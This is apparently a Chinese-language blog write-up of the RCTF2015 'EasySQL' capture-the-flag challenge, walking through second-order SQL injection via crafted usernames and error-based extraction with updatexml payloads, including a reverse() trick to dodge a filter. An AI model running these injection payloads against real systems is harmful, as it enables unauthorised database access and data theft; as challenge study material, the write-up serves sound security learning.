[RCTF2015]EasySQL
- 二次注入
- 报错注入
- 进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了
admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。 - 因为并不清楚sql语句的闭合方式,所以重新注册一个
admin"#,登陆后也没有起到作用。 - 注册
admin\,登陆进去后修改密码,结果出现报错。
可以看到原语句中的username是双引号闭合的,所以单引号注册的账号是不起作用的.由此推断,我们注册admin"#因为闭合语句且将后面进行了注释,所以是可以sql语句会变为更改admin的语句。
由此,修改admin"#作为admin的密码登陆。
由此证实我们的判断。但是这道题不是一道提权的问题,虽然登陆了admin用户但是并没有什么结果。然后我们将注意力放在那个修改密码报错的地方。
设想可以注册一个用于报错的用户登陆,来修改密码的地方进行报错注入,然后显示出需要的内容。
-
在注册页面fuzz一下过滤的字符
-
测试
username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#&password=1&email=1
username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=‘flag’))),1))#&password=1&email=1
username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag))),1))#&password=1&email=1
发现flag不全,且说flag不在这儿,那么试试其他表。
username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=‘users’))),1))#&password=1&email=1
username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^f’))),1))#&password=1&email=1
显示位不够用,但是过滤了right。可以使用reverse()
username=xxx"||(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^f’)))),1))#&password=1&email=1
695
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
